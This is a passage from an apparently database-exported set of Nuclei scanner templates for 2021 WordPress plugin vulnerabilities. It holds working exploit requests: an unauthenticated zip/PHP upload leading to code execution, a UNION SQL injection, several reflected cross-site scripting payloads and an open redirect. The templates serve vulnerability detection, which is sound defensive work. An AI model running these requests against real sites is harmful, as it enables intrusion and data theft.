CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24278\n cwe-id: CWE-863\n epss-score: 0.05506\n epss-percentile: 0.93039\n cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: querysol\n product: redirection_for_contact_form_7\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php\"\n\n body: \"action=wpcf7r_get_nonce¶m=wp_rest\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - '\"success\":true'\n - '\"nonce\":\"[a-f0-9]+\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - '\"nonce\":\"[a-f0-9]+\"'\n part: body\n# digest: 4b0a00483046022100d9abb764ee6563027af072cc23d4c9c16f80410112aba32996d15ad9d82c5a5a022100e439314dc9a6527a0d80b588b231ae631ee122f0d97542b41b800ffed7a3f51f:922c64590222798bb761d5b6d8e72950", "hash": "5f4a22e6477adcdd8461c8156f8276f6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a6" }, "name": "CVE-2021-24284.yaml", "content": "id: CVE-2021-24284\n\ninfo:\n name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload\n author: lamscun,pussycat0x,pdteam\n severity: critical\n description: |\n WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website.\n remediation: |\n Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5\n - https://github.com/advisories/GHSA-wqvg-8q49-hjc7\n - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/\n - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/\n - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24284\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24284\n cwe-id: CWE-434\n epss-score: 0.96657\n epss-percentile: 0.99614\n cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: kaswara_project\n product: kaswara\n framework: wordpress\n tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project\nvariables:\n zip_file: \"{{to_lower(rand_text_alpha(6))}}\"\n php_file: \"{{to_lower(rand_text_alpha(2))}}.php\"\n php_cmd: \"\"\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n --------------------------d3be34324392a708\n Content-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\n Content-Type: application/octet-stream\n\n {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n --------------------------d3be34324392a708\n Content-Disposition: form-data; name=\"fontsetname\"\n\n {{zip_file}}\n --------------------------d3be34324392a708\n Content-Disposition: form-data; name=\"action\"\n\n uploadFontIcon\n --------------------------d3be34324392a708--\n - |\n GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - \"wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css\"\n\n - type: word\n part: body_2\n words:\n - \"phpinfo()\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e1a752336a035ad58ba8e8890423741186763e78ae3b2667af5b0960c551a67b02200e3e7d2f1037d51705f684c0eb909f58a0c7006c413973abe7884f18771d8cdc:922c64590222798bb761d5b6d8e72950", "hash": "2b8d529e73e45f49dc4a25b267e8d79b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a7" }, "name": "CVE-2021-24285.yaml", "content": "id: CVE-2021-24285\n\ninfo:\n name: WordPress Car Seller - Auto Classifieds Script - SQL Injection\n author: ShreyaPohekar\n severity: critical\n description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script.\n reference:\n - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/\n - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162\n - https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24285\n cwe-id: CWE-89\n epss-score: 0.21023\n epss-percentile: 0.95973\n cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: cars-seller-auto-classifieds-script_project\n product: cars-seller-auto-classifieds-script\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220172be49164feec344dfa1d49f0cdf335917a5d2a75846fce80ea6e1bbe5b7bee02210089fab324ff44731061d8adcd715f206c9c089bd9a7fe64fea86c8c3aedf97623:922c64590222798bb761d5b6d8e72950", "hash": "4511ddfdfa9e3de8bb774f7f74a04693", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a8" }, "name": "CVE-2021-24286.yaml", "content": "id: CVE-2021-24286\n\ninfo:\n name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.\n remediation: Fixed in version 1.3.1\n reference:\n - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27\n - https://www.exploit-db.com/exploits/50350\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24286\n - https://wordpress.org/plugins/redirect-404-to-parent/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24286\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: mooveagency\n product: redirect_404_to_parent\n framework: wordpress\n tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")'\n - 'status_code_2 == 200'\n condition: and\n# digest: 4b0a004830460221009c8a16dca3ea8098cdf84c96ec66655812cb68fb55b9e286f7fe420d60faa9110221009d1a382904cfdd55a6f49320a79ef9b8f3b938ad8bc9db2d8b1fadfd597b6e3d:922c64590222798bb761d5b6d8e72950", "hash": "56b03ef5662367ca469ef56062ea681c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a9" }, "name": "CVE-2021-24287.yaml", "content": "id: CVE-2021-24287\n\ninfo:\n name: WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.3.2.\n reference:\n - https://www.exploit-db.com/exploits/50349\n - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf\n - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24287\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24287\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: mooveagency\n product: select_all_categories_and_taxonomies\\,_change_checkbox_to_radio_buttons\n framework: wordpress\n tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\")'\n - 'contains(body_2, \"Set up the taxonomies\")'\n condition: and\n# digest: 490a004630440220331de77e11f4fd8c6eb5947ea08b967c217e35cecc249be01ac24e264c67cb8402205f29a68c7018c29021c2f9a42175170a1c54ed085d505a1ed2d012236cac7ec8:922c64590222798bb761d5b6d8e72950", "hash": "ccd6505429c52e795fd7ad459eea99d0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082aa" }, "name": "CVE-2021-24288.yaml", "content": "id: CVE-2021-24288\n\ninfo:\n name: WordPress AcyMailing <7.5.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24288\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24288\n cwe-id: CWE-601\n epss-score: 0.00129\n epss-percentile: 0.47456\n cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: acymailing\n product: acymailing\n framework: wordpress\n tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022100dea3cbf54f50326db8a7cbe9c797a7d01e224af22ec2b849fde4047988e95b50022052cd3007e67dc0c21a9cb9d2bb25fce7cf31bb2d63ecfe1d826358cfb03c9983:922c64590222798bb761d5b6d8e72950", "hash": "f192acc3c13077299bf8a4f59c5588e9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ab" }, "name": "CVE-2021-24291.yaml", "content": "id: CVE-2021-24291\n\ninfo:\n name: WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: |\n WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update WordPress Photo Gallery by 10Web to version 1.5.69 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a\n - https://packetstormsecurity.com/files/162227/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24291\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24291\n cwe-id: CWE-79\n epss-score: 0.00084\n epss-percentile: 0.34815\n cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: 10web\n product: photo_gallery\n framework: wordpress\n tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n words:\n - \"onmouseover=alert(document.domain)//\"\n - \"wp-content/uploads/photo-gallery\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220530060b9231214c3948331f2fc9151166f95e489be988572b86a607150d1ef12022100aacb96e91813386ae60992bae5c87ad91e0ca09b7a1801f42b2d7cdf30950423:922c64590222798bb761d5b6d8e72950", "hash": "53218cfcebeae0e966275b9027db7988", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ac" }, "name": "CVE-2021-24298.yaml", "content": "id: CVE-2021-24298\n\ninfo:\n name: WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability.\n reference:\n - https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/\n - https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24298\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24298\n cwe-id: CWE-79\n epss-score: 0.00123\n epss-percentile: 0.45761\n cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ibenic\n product: simple_giveaways\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '= Simple Giveaways'\n\n - method: GET\n path:\n - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100934bf7080b3d93a65ddd9caff54bd309aa1d8788dc598dd103b6357cdfb57011022014bb7403e7c0e8b16169d4a25120d2dc0dae91f23747101e193be8c8125c3ce8:922c64590222798bb761d5b6d8e72950", "hash": "078238e963fb5044b6aebf9af53a2b5a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ad" }, "name": "CVE-2021-24300.yaml", "content": "id: CVE-2021-24300\n\ninfo:\n name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24300\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24300\n cwe-id: CWE-79\n epss-score: 0.00338\n epss-percentile: 0.70768\n cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: pickplugins\n product: product_slider_for_woocommerce\n framework: wordpress\n tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"\\\"onmouseover=alert(document.domain);//\">'\n - \"PickPlugins Product Slider\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c921ac5e1370ee8254b2f60b17eb43e9636eab5381b19d528ddffe26ebbd0e670220460bf20def01d52a5c93aca05c79a748d9244053258932d97f65ccb5323b410a:922c64590222798bb761d5b6d8e72950", "hash": "c55e22a80053e968fd3725c817d6991e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ae" }, "name": "CVE-2021-24316.yaml", "content": "id: CVE-2021-24316\n\ninfo:\n name: WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Mediumish Theme plugin (1.0.47 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e\n - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt\n - https://www.wowthemes.net/themes/mediumish-wordpress/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24316\n - https://github.com/ZephrFish/AutoHoneyPoC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24316\n cwe-id: CWE-79\n epss-score: 0.00317\n epss-percentile: 0.69851\n cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wowthemes\n product: mediumish\n framework: wordpress\n tags: cve2021,cve,mediumish,xss,wordpress,wpscan,intrusive,wowthemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E \"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - Sorry, no posts matched your criteria.\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ae8fcc2d6914ccc76596fda76037f35a2be4f783e8235640658b1ddcca4fd0d02204cfde07015adbd07b9e358a136ff26a457fd6c72dea188f3957fcd0e55048236:922c64590222798bb761d5b6d8e72950", "hash": "65d9fa0079e7c2a541297f8be3454021", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082af" }, "name": "CVE-2021-24320.yaml", "content": "id: CVE-2021-24320\n\ninfo:\n name: WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update WordPress Bello Directory & Listing Theme to version 1.6.0 or later to mitigate the vulnerability.\n reference:\n - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt\n - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24320\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24320\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.45256\n cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: bold-themes\n product: bello\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n - '{{BaseURL}}/wp-content/themes/bello/readme.txt'\n\n stop-at-first-match: true\n matchers:\n - type: word\n internal: true\n words:\n - 'wp-content/themes/bello/fonts'\n - 'bold-themes.com/bello'\n condition: or\n\n - method: GET\n path:\n - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008e15f1d12a3c256545b2354d77805fba07dab4bd51e44c3fe7091d44faae1335022100a6fb26884ef13ceb3a1c3a2e828fd31823f1db0983fe693cbcfc5123cb4419ba:922c64590222798bb761d5b6d8e72950", "hash": "c92d21737cf86e049b960f4beaf6fba0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b0" }, "name": "CVE-2021-24335.yaml", "content": "id: CVE-2021-24335\n\ninfo:\n name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability.\n reference:\n - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557\n - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt\n - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24335\n - https://m0ze.ru/vulnerability/%5B2021-02-12%5D-%5BWordPress%5D-%5BCWE-79%5D-Car-Repair-Services-WordPress-Theme-v3.9.txt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24335\n cwe-id: CWE-79\n epss-score: 0.00181\n epss-percentile: 0.54412\n cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\\&_auto_mechanic:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: smartdatasoft\n product: car_repair_services_\\&_auto_mechanic\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/car-repair-services/css'\n - '/wp-content/themes/car-repair-services/js'\n - 'id=\"car-repair-services-'\n condition: or\n\n - method: GET\n path:\n - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206ee5628010c7f23879f3e1a01c1890305b99db8d3cc1cb2718617cb2ef30780e02202b639a37a1dd866da6c94bfc1fe3d592d5ea367c2c3f2c31e551a20a425eaea9:922c64590222798bb761d5b6d8e72950", "hash": "9ef673263fdc916911515ca0f9c39871", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b1" }, "name": "CVE-2021-24340.yaml", "content": "id: CVE-2021-24340\n\ninfo:\n name: WordPress Statistics <13.0.8 - Blind SQL Injection\n author: lotusdll,j4vaovo\n severity: high\n 